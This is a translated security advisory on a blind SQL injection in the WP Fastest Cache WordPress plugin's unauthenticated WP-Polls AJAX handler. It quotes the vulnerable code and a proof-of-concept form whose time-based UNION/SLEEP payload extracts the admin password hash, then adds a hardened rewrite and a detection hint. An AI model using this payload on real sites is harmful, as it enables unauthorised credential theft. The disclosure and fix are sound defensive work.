Plugin homepage: https://wordpress.org/plugins/wp-fastest-cache/
This vulnerability requires the WP-Polls plugin to be installed.
File: wp-fastest-cache\inc\wp-polls.php
```php
public function hook(){
    // wp_ajax_nopriv_* registers the handler for visitors who are not logged in,
    // so the endpoint is reachable without authentication.
    add_action( 'wp_ajax_nopriv_wpfc_wppolls_ajax_request', array($this, "wpfc_wppolls_ajax_request"));
    add_action( 'wp_ajax_wpfc_wppolls_ajax_request', array($this, "wpfc_wppolls_ajax_request"));
}
```
$_POST["poll_id"] is not effectively filtered: mysql_real_escape_string() only escapes \x00, \n, \r, \, ', " and \x1a, and the value is later interpolated unquoted into a numeric comparison in the SQL query, so escaping quote characters does not prevent injection.
File: wp-fastest-cache\inc\wp-polls.php
```php
public function wpfc_wppolls_ajax_request() {
    $id = strip_tags($_POST["poll_id"]);
    // Only escapes quotes and a few control characters; $id is used unquoted below.
    $id = mysql_real_escape_string($id);
    $result = check_voted($id);
    if($result){
        echo "true";
    }else{
        echo "false";
    }
    die();
}
```
So injection is possible at the two queries in check_voted_ip() and check_voted_username().
File: wp-polls\wp-polls.php
```php
function check_voted($poll_id) {
    $poll_logging_method = intval(get_option('poll_logging_method'));
    switch($poll_logging_method) {
        // Do Not Log
        case 0:
            return 0;
            break;
        // Logged By Cookie
        case 1:
            return check_voted_cookie($poll_id);
            break;
        // Logged By IP
        case 2:
            return check_voted_ip($poll_id);
            break;
        // Logged By Cookie And IP
        case 3:
            $check_voted_cookie = check_voted_cookie($poll_id);
            if(!empty($check_voted_cookie)) {
                return $check_voted_cookie;
            } else {
                return check_voted_ip($poll_id);
            }
            break;
        // Logged By Username
        case 4:
            return check_voted_username($poll_id);
            break;
    }
}

function check_voted_ip($poll_id) {
    global $wpdb;
    $log_expiry = intval(get_option('poll_cookielog_expiry'));
    $log_expiry_sql = '';
    if($log_expiry > 0) {
        $log_expiry_sql = 'AND ('.current_time('timestamp').'-(pollip_timestamp+0)) < '.$log_expiry;
    }
    // Check IP From IP Logging Database
    // $poll_id is interpolated unquoted into the query string.
    $get_voted_aids = $wpdb->get_col("SELECT pollip_aid FROM $wpdb->pollsip WHERE pollip_qid = $poll_id AND pollip_ip = '".get_ipaddress()."' $log_expiry_sql");
    if($get_voted_aids) {
        return $get_voted_aids;
    } else {
        return 0;
    }
}

function check_voted_username($poll_id) {
    global $wpdb, $user_ID;
    // Check IP If User Is Guest
    if (!is_user_logged_in()) {
        return 1;
    }
    $pollsip_userid = intval($user_ID);
    $log_expiry = intval(get_option('poll_cookielog_expiry'));
    $log_expiry_sql = '';
    if($log_expiry > 0) {
        $log_expiry_sql = 'AND ('.current_time('timestamp').'-(pollip_timestamp+0)) < '.$log_expiry;
    }
    // Check User ID From IP Logging Database
    // Same pattern: $poll_id goes into the query unquoted.
    $get_voted_aids = $wpdb->get_col("SELECT pollip_aid FROM $wpdb->pollsip WHERE pollip_qid = $poll_id AND pollip_userid = $pollsip_userid $log_expiry_sql");
    if($get_voted_aids) {
        return $get_voted_aids;
    } else {
        return 0;
    }
}
```
PoC
```html
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request">
  <input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- ">
  <input type="submit" value="Send">
</form>
```
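As an added example (not the plugin's or WP-Polls' own code), the following is a hardened equivalent of the AJAX handler and of check_voted_ip(): poll_id is reduced to a non-negative integer with absint() before any database code sees it, and the lookup query is built with $wpdb->prepare() so that the poll id, the client IP and the expiry arithmetic are bound as typed placeholders instead of being string-interpolated. The table name $wpdb->pollsip, get_ipaddress() and the option names are the ones shown on the page; the class name, function name and the direct call to the IP-logging path (instead of the check_voted() dispatch) are choices made for this example.

```php
<?php
// Added example, not the plugin's own code. Hardened equivalents of the
// handler in wp-polls.php and of check_voted_ip(). $wpdb->pollsip,
// get_ipaddress() and the option names are as they appear on the page;
// the class and function names below are chosen for this example.

class Wpfc_Wppolls_Hardened {

    public function hook() {
        add_action('wp_ajax_nopriv_wpfc_wppolls_ajax_request', array($this, 'ajax_request'));
        add_action('wp_ajax_wpfc_wppolls_ajax_request', array($this, 'ajax_request'));
    }

    public function ajax_request() {
        // Type-enforce at the boundary: poll ids are positive integers, so
        // anything else is rejected before it can reach a query.
        $id = isset($_POST['poll_id']) ? absint($_POST['poll_id']) : 0;
        if ($id === 0) {
            wp_send_json_error(array('message' => 'invalid poll_id'), 400);
        }

        // The plugin dispatches through check_voted(); the IP-logging path is
        // called directly here to keep the example short.
        $result = hardened_check_voted_ip($id);
        echo $result ? 'true' : 'false';
        wp_die();
    }
}

// Same query as check_voted_ip(), but every runtime value is a placeholder:
// %d for the poll id, the timestamp and the expiry window, %s for the IP.
function hardened_check_voted_ip($poll_id) {
    global $wpdb;

    $poll_id    = absint($poll_id);
    $log_expiry = intval(get_option('poll_cookielog_expiry'));

    $sql  = "SELECT pollip_aid FROM {$wpdb->pollsip} WHERE pollip_qid = %d AND pollip_ip = %s";
    $args = array($poll_id, get_ipaddress());

    if ($log_expiry > 0) {
        $sql   .= " AND (%d - (pollip_timestamp + 0)) < %d";
        $args[] = current_time('timestamp');
        $args[] = $log_expiry;
    }

    $voted = $wpdb->get_col($wpdb->prepare($sql, $args));
    return $voted ? $voted : 0;
}
```

The absint() in the handler is the check that matters most for this bug: mysql_real_escape_string() was the wrong tool because poll_id is compared as a number, a context in which no quote character is ever needed. check_voted_username() interpolates $poll_id the same way and gets the same treatment. For detection, a POST to admin-ajax.php with action=wpfc_wppolls_ajax_request whose poll_id is anything other than a plain integer is a reliable signal in request logs.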
Source: https://rstforums.com/forum/107273-wordpress-wp-fastest-cache-plugin-0-8-4-8-blind-sql-injection.rst
Translation: 小歪 (WeChat public account 关注安全技术 & heresec)
This article was first published on the WeChat public account 关注安全技术: WordPress WP Fastest Cache plugin 0.8.4.8 blind SQL injection
Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site accepts no legal or joint liability. For questions, contact us by e-mail (use a corporate or otherwise valid mailbox so the message is not blocked; contact details are on the home page).